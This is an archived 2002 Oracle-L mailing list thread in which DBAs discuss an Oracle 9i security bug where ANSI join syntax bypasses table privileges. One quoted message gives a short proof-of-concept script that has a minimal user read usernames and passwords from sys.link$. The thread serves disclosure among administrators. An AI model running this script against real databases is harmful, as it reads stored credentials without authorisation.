Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> RE: security bug - join syntax

RE: security bug - join syntax

From: Deshpande, Kirti <kirti.deshpande_at_verizon.com>
Date: Fri, 19 Jul 2002 10:58:26 -0800
Message-ID: <F001.0049CE1C.20020719105826@fatcity.com>


Is this still a problem in 9iR2? I do not have it installed yet :(

> -----Original Message-----
> From: Jared.Still_at_radisys.com [SMTP:Jared.Still_at_radisys.com]
> Sent: Friday, July 19, 2002 12:05 PM
> To: Multiple recipients of list ORACLE-L
> Subject: Re: security bug - join syntax
>
> Thanks Linda.
>
> Usenet seems to be a little behind the curve though.
>
> Jonathan Lewis discovered this and posted on the list
> ( you saw it here first! ) over a month ago.
>
> Jared
>
>
>
>
>
> Linda.Miller-Coker_at_jpmorgan.com
> Sent by: root_at_fatcity.com
> 07/19/2002 09:23 AM
> Please respond to ORACLE-L
>
>
> To: Multiple recipients of list ORACLE-L
> <ORACLE-L_at_fatcity.com>
> cc:
> Subject: Re: security bug - join syntax
>
>
>
> This just in from comp.databases.oracle.server.
>
> See metalink bug 2121935.
>
> Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)
> allows you to view data from tables on which you have no
> privilege. For example, try this COMPLETE script:
>
> connect / as sysdba
> create user us1 identified by us1;
> grant create session to us1;
>
> connect us1/us1
>
> select userid, password
> from
> sys.link$ cross join dual
> ;
>
>
>
>
> "Adams, Matthew (GEA, MABG, 088130)" <MATT.ADAMS_at_APPL.GE.COM>@fatcity.com
> on 07/19/2002 11:04:17 AM
>
> Please respond to ORACLE-L_at_fatcity.com
>
>
>
> Sent by: root_at_fatcity.com
>
>
> To: Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com>
> cc:
>
>
>
>
> Anybody remember the bug number for the security issue
> with the new join syntax in 9i?
>
> ----
> Matt Adams - GE Appliances - matt.adams_at_appl.ge.com
> The ozone layer or cheese in a spray can.
> Don't make me choose.
>
>
>
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author:
> INET: Linda.Miller-Coker_at_jpmorgan.com
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
>
>
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author:
> INET: Jared.Still_at_radisys.com
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).

-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- 
Author: Deshpande, Kirti
  INET: kirti.deshpande_at_verizon.com

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).
Received on Fri Jul 19 2002 - 13:58:26 CDT

Original text of this message

HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US